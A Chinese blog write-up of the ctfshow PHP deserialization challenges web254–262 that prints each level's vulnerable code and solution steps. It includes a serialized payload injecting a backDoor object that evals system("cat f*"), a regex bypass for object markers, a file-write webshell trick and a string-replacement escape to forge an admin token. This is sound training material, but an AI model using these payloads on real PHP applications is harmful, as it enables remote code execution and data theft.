ctfshow 反序列化1

最新推荐文章于 2024-08-20 00:33:12 发布
最新推荐文章于 2024-08-20 00:33:12 发布
阅读量1.3k 收藏 2
点赞数 3
分类专栏: 刷题 wp 文章标签: php ctf 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/123300963
版权

web254

 主要是考察能不能看懂这个类,跟反序列化没关系

payload:/?username=xxxxxx&password=xxxxxx

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx'; //这里定义了属性值
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){ //这句判断是解题关键$this->username就是xxxxxx
                                  //而$u就是下面GET传入的username
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;  //满足条件后isVip就为真,然后一直顺利走下去了
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();             //实例化类
    if($user->login($username,$password)){ //login方法调用传入的变量
        if($user->checkVip()){          //判断为真进行下一步
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

web255

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){    //相较于上题,判断成功后$isVip也不为true
        return $this->username===$u&&$this->password===$p;  
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    //反序列化cookie传入的user
                                              //这里需要的是实例化这个$user
    if($user->login($username,$password)){   //所以我们构造序列化后的语句并传入cookie来实现
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

由于需要序列化的操作,自己搞个php文件copy代码修改,执行来获得自己想要的东西

我们需要 $user= new ctfShowUser(); 

也就是 new ctfShowUser()  序列化后的字符串,这里还需要url编码

echo urlencode(serialize(new ctfShowUser()));

这样就成了

 

web256

相较于上题,只有这里是不同的,所以只需弄明白怎么绕过这里就可了

很简单,就是让username不等于password,

 public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }

将username 和 password 的值改变了,再去序列化构造 payload

 

 
web257

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();  //这里可以让$this->class表示info()实例化
                                    自然也可以实例化 backDoor()
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);    //解题关键
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

摘抄羽师傅的:

大致浏览下代码会发现我们可以利用的函数eval,要想调用eval就得使用backDoor类中的getinfo。
然后在ctfShowUser类的__destruct中发现了$this->class->getInfo();,那么我们只需要让$this->class是backDoor类的实例化就可以了。
反序列化时,首先调用__destruct,接着调用$this->class->getInfo();也就是backDoor->getinfo(),最后触发eval。

web258 

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

也是在上一题的基础上加强了判断,正则过滤,不能出现 O : 数字  

解释:
[oc] --> 匹配内部某个字符
\d --> 匹配数字
+ --> 匹配至少一个


O:11:"ctfShowUser":1:{s:18:"ctfShowUserclass";O:8:"backDoor":1:{s:14:"backDoorcode";s:17:"system("cat f*");";}} 

也就是过滤了序列化字符串的一种标识,用 +数字 替代 数字

自己构造:

 

web259

有点难啊

从一道题学习SoapClient与CRLF组合拳_Y4tacker的博客-CSDN博客

web260

<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    echo $flag;
}

题目意思就是你序列化出来的东西需要包含字符串ctfshow_i_love_36D

payload: /?ctfshow=ctfshow_i_love_36D

因为传值后 $_GET['ctfshow'] 序列化出来的东西就是s:18:"ctfshow_i_love_36D";

 

web261

class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){ 
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){  //这题没用
        eval($this->code);
    }

    public function __sleep(){  //这题没用
        $this->username='';   
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){  //弱类型等于877
            file_put_contents($this->username, $this->password);
        }
    }
}

unserialize($_GET['vip']);

 

这题的关键就是username和password拼接成的$this->code弱等于877(0x36d)

如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法,
则只有 __unserialize() 方法会生效,__wakeup() 方法会被忽略。

 当反序列化时会进入__unserialize中,而且也没有什么方法可以进入到__invoke中

只要满足code==0x36d(877)就可以了。
而code是username和password拼接出来的。
所以只要username=877.php password=shell就可以了。
877.php==877是成立的(弱类型比较)

 先/?vip=序列化内容 ,然后访问877.php 进行rce  (不是很理解)

 

 web262

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

message.php

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }

也就是需要使token变成admin

群主的详解:有关字符逃逸

CTFshow-web入门-反序列化_哔哩哔哩_bilibili

先本地构造,查看字符逃逸

<?php
class message
{
    public $from;
    public $msg;
    public $to;
    public $token = 'user';
    public function __construct($f, $m, $t)
    {
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

function filter($msg)
{
    return str_replace('fuck', 'loveU', $msg); //这里交换值造成字符逃逸
}

$msg = new message('fuck', 'b', 'c');
$msg_1 = serialize($msg); //序列化
echo $msg_1;
//O:7:"message":4:{s:4:"from";s:4:"fuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
$msg_2 = filter($msg_1); //序列化字符串交换fuck和loveU
echo $msg_2;
//O:7:"message":4:           {s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
          这里明显 loveU是5个字符,却表示4个

 

 payload有62个字符,我们之前fuck交换loveU得到1个字符差距

所以这次用62个fuck交换

 根据题意,序列化的结果再去base64,然后传入cookie

 

 

 

ThnPkm
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c#序列化和反序列化
05-24
1. **定义可序列化的类**:首先,我们需要定义一个类,并在类声明前加上`[Serializable]`属性,以指示这个类可以被序列化。 ```csharp [Serializable] public class Person { public string Sno { get; set; }...
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
ctfshow254-278(代码审计,反序列化)
qq_37561898的博客
01-22 2625
ctfshow254-278(代码审计,反序列化),ctfshow web
ctfshow web入门(php反序列化)
qq_53263789的博客
07-19 527
ctfshow
ctfshow 反序列化
m0_62422842的博客
07-07 1835
涉及到的题目是web254~web266
ctfshow—web入门—反序列化
2301_80337881的博客
03-24 937
别看上面乌拉乌拉一大堆,实际上就是要检测你传入的username和password和类中定义的username和password一不一样。所以直接get传参就可以了。
ctfshow-web256(反序列化)
m0_62094846的博客
02-23 614
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
Cereal序列化反序列化
07-07
Cereal支持将对象序列化为JSON、XML和二进制格式,并提供了灵活的API来自定义序列化和反序列化过程。它可以序列化基本数据类型、STL容器、自定义类和结构体等。不需要安装,只需把hpp文件包含在项目即可。
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
CTFSHOW 反序列化
热门推荐
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
ctfshow php反序列化
m0_74940843的博客
11-12 268
序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化和反序列化会用到两个函数serialize 将对象格式化成有序的字符串unserialize 将字符串还原成原来的对象序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。常用的魔术方法。
[BUUCTF] 备赛刷题第一天
Dannie01的博客
11-01 2189
[极客大挑战 2019]RCE ME Wallbreaker_Easy 绕过disabled function 狠简单 一把嗦 [SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex
ctfshow-web257(反序列化)
m0_62094846的博客
02-23 1842
__destruct()是PHP面向对象编程的另一个重要的魔法函数,该函数会在类的一个对象被删除时自动调用。 我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等。其实,__destruct()在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。通常只是用来完成对象被删除时的清理动作而已。 类中的getinfo()方法通常用于获取一些信息。(java的,php的没找到) <?php /* # -*- coding: utf-8 -*- # ...
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2823
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow反序列化模块
whisper921的博客
04-07 6057
web254 GET传参即可: ?username=xxxxxx&password=xxxxxx 得到flag ctfshow{03b60d01-62ef-4703-8217-684bb53b866a} web255 web256 把PHP里面的username和password改成不一样的即可,然后和get传入的对应。 web257 web258 web259 web260 ...
ctfshow web入门 web254——— 反序列化wp
最新发布
2202_75289892的博客
08-20 596
代码审计:定义了ctfShoeUser类get传参username和password,isset()是检查变量是否被定义的函数,若变量被定义且值不是null,那么返回值是true,接着实例化对象user.....最终输出flag所以我们传入的参数只要是已经被定义的值就行?
ctfshow web入门 反序列化 前篇 254-266
m0_64815693的博客
04-08 1767
ctfshow web入门 反序列化 254-278
ctfshow-反序列化关卡详解分析
FreyZzz的博客
05-09 998
--254 class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this->username===$u&am
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法...综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值